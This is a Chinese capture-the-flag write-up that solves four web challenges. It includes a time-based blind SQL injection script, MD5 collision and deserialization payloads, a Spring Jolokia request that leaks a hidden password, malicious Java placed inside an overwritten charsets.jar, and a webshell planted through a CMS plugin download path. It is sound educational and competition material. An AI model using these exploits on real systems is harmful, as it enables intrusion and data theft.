目录
1、blindsql2
2、chocolate
3、隐藏的密码
4、ezcmsss
题目对勇师傅来说已经是开始上难度了所以这周没有AK
分享下自己做出来的题的解题思路
1、blindsql2
原本是在继续构造新的 payload,也测到了延时
打算去改上周的脚本,结果去跑的时候忘了将上次的最后 payload 注释,直接就上周的脚本就跑出来 flag 了,week3 应该是打算考布尔盲注,week4 是时间盲注,所以直接就都打通了。
exp:
# @author:Myon# @time:20241015import requestsimport stringimport timeurl = 'http://eci-2ze6n37avcrdqdbhno0a.cloudeci1.ichunqiu.com/'dic = string.ascii_lowercase + string.digits + '{}-_'out = ''for j in range(1, 100): a = 1 #设置一个标志位,用来判断是否已经猜到了最后一位 for k in dic: # payload = f"student_name=0'or%09if(database()%09like%09%27{out+k}%25%27,sleep(1),0)and%271" # 猜数据库名 # print(payload) # payload = f"student_name=0'or%09||if((select%09table_name%09from%09information_schema.tables%09where%09table_schema%09like%09'flag'limit%092,1)like'{out+k}%25',sleep(1),0)and%271" # payload = f"student_name=Alice%27||if((select%09column_name%09from%09information_schema.columns%09where%09table_schema%09like%09'ctf'and%09table_name%09like'secrets'limit%091,1)like'{out+k}%25',sleep(1),0)and%271" payload = f"student_name=Alice%27||if((select%09secret_value%09from%09ctf.secrets%09limit%092,1)like%09'{out+k}%25',sleep(1),0)and%271" re = requests.get(url, params=payload) # print(re.status_code) t = re.elapsed.total_seconds() # print(f"{j}:{time}") if t > 1.5: print(k) a = 0 #如果找到字符,则将标志位置0 out += k print(out) time.sleep(1) break #跳出内层的for循环,继续遍历下一位 # if a == 1: #在进行下一次循环前,先判断当前字符是否找到 # break #若没有找到,则跳出外层循环,表示我们已经到了最后一个字符print(out)
2、chocolate
目录扫描扫到了个 source.php,访问看不到内容
随便输一些东西测到了一个提示:
访问,然后绕过一下:
0ldStar.php?num=+02471
拿到:
可可液块 (g): 1337033 // gur arkg yriry vf : pbpbnOhggre_fgne.cuc, try to decode this 牢师傅如此说到让我们解密这个,扔到随波逐流发现是个文件名
继续访问 cocoaButter_star.php
第一个是 md5 强碰撞:
cocoaButter_star.php?cat=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&dog=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
第二个传一个 0e 开头的 md5 加密后也是 0e 开头的即可实现相等,科学计数法都是 0
Payload:
moew=0e215962017
拿到:of course you konw// 可可脂 (g): 202409
最后一个是要求 md5 加密后前五位符合要求,一开始想到的是 md5 长度拓展攻击,发现不是,写个脚本爆破符合要求的字符即可:
import hashlibknowMd5 = '8031b' # 已知的md5前缀dict = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ' # 字符字典def md5(text): return hashlib.md5(str(text).encode('utf-8')).hexdigest() # 计算md5哈希值# 爆破过程for i in dict: for j in dict: for k in dict: for l in dict: # 生成四个字符组合 x = i + j + k + l # 计算md5 codeMd5 = md5(x) # 如果md5前五个字符等于已知的8031b if codeMd5[:5] == knowMd5: print(f"符合要求的next_level值:{x}") break # 找到符合的组合后退出循环
比如我们传入 aNQa
拿到 of course you konw// 可可脂 (g): 202409// final.php
最后 final.php 是一个反序列化的利用,一开始还想绕过过滤的 chocolate,后面发现不需要绕过,并且 url 编码后传入不行,直接传序列化后的内容。
exp:
<?phpclass chocolate{ public $cat='???'; public $kitty='???'; public function __construct($u,$p){ $this->cat=$u; $this->kitty=$p; } public function eatit(){ return $this->cat===$this->kitty; } public function __toString(){ return $this->cat; } public function __destruct(){ global $darkCocoaPowder; echo $darkCocoaPowder; }}$u = '111';$p = '111';$c = new chocolate($u,$p);echo serialize($c);?>让 $cat===$kitty 即可
Post传入:
O:9:"chocolate":2:{s:3:"cat";s:3:"111";s:5:"kitty";s:3:"111";}
拿到:黑可可粉 (g): 51540
最后还剩一个糖分,经过测试发现页面会有不同回显
确定范围是在 2000-2050 之间
Burpsuite 爆破一下:
拿到 flag:flag{d20ea743-bbae-4b75-a8e4-098c4ddecd5f}
3、隐藏的密码
目录扫描
/back.html
但是文件上传后访问不到,命令执行的是 ls
/actuator/env 接口下发现密码被******代替了
尝试获取星号的内容
Post:/actuator/jolokia
{ "mbean": "org.springframework.boot:name=SpringApplication,type=Admin", "operation": "getProperty", "type": "EXEC", "arguments": ["caef11.passwd"]}
拿到密码:123456qWertAsdFgZxCvB!@#
登录,发现界面内容和前面目录扫描出来的 back.html 是一样的…
命令执行模块 fuzz 测试一下,存在一些字符的过滤,过滤字符如下:
!$&();<>[\]`{|}
可以看到异或和取反都是可以使用的
尝试命令执行,发现不行
文件能传上去但是访问不到
找到了JDK HOME 目录:
/usr/local/openjdk-8/jre/lib
确认一下,确实可以成功上传文件到这个位置:
../../usr/local/openjdk-8/jre/lib/charsets.jar
那么我们直接覆盖 charsets.jar
触发:
Accept: text/html;charset=GBK
确实可以利用
重新构造一个 jar 包,通过将 class 文件反编译拿到了 java 源码,这里主要是替换 IBM33722.class
修改后的源码如下:
package sun.nio.cs.ext;import java.io.BufferedReader;import java.io.File;import java.io.FileReader;import java.io.FileWriter;import java.io.IOException;import java.util.UUID;public class IBM33722 { static { fun(); } public IBM33722(){ fun(); } private static java.util.HashMap<String, String> fun(){ String flagFilePath = "/flag"; String fileName = readFlag(flagFilePath); if (fileName == null) { fileName = "failed"; } String random = UUID.randomUUID().toString().replace("-", "").substring(1, 9); String tempFilePath = "/tmp/" + fileName + "_" + random + ".log"; createTempFile(tempFilePath); return null; } private static String readFlag(String path) { StringBuilder content = new StringBuilder(); try (BufferedReader reader = new BufferedReader(new FileReader(new File(path)))) { String line; while ((line = reader.readLine()) != null) { content.append(line); } } catch (IOException e) { return null; } return content.toString(); } private static void createTempFile(String path) { try (FileWriter writer = new FileWriter(new File(path))) { writer.write(path); } catch (IOException e) { e.printStackTrace(); } }}读取根目录下的 flag,将内容写到 /tmp 目录下的文件名(因为我们只能执行ls命令)
编译成 class 文件,整体打包成 jar 包,上传覆盖 charsets.jar
重启环境,上传新的 charsets.jar
覆盖掉后触发方式同上
查看 /tmp 目录
拿到 flag:flag{d3350ef4-3b91-40e6-9d6a-2f0c8d33193e}
4、ezcmsss
Start.sh里拿到账户密码:
admin_name=jizhicms1498&admin_pass=4oP4fB51r5登录后台:admin.php
允许上传 php 文件
后端还做了检测
在前端随便注册一个账号
尝试上传但是没有分栏可选
在后台添加一下
还是不行,配置文件也传不了,估计这个漏洞已经修了
又看到另一个下载插件路径可控的,但是插件管理里面并没有看到可以下载插件的地方, 手动构造一下,但是似乎出不了网...
那就手动传一个一句话木马的 zip 到它的本地
从本地下载插件:
action=start-download&filepath=dbrestore&download_url=http://127.0.0.1/static/upload/2024/10/26/202410262358.zip
解压:
action=file-upzip&filepath=dbrestore&download_url=http://127.0.0.1/static/upload/2024/10/26/202410262358.zip&filesize=0
访问 /A/exts,看到我们传的压缩包被解压了,得到一句话木马
调用木马:
读取 flag
拿到 flag:flag{9bb4ad6c-68e7-44ed-badd-4614a81f7df7}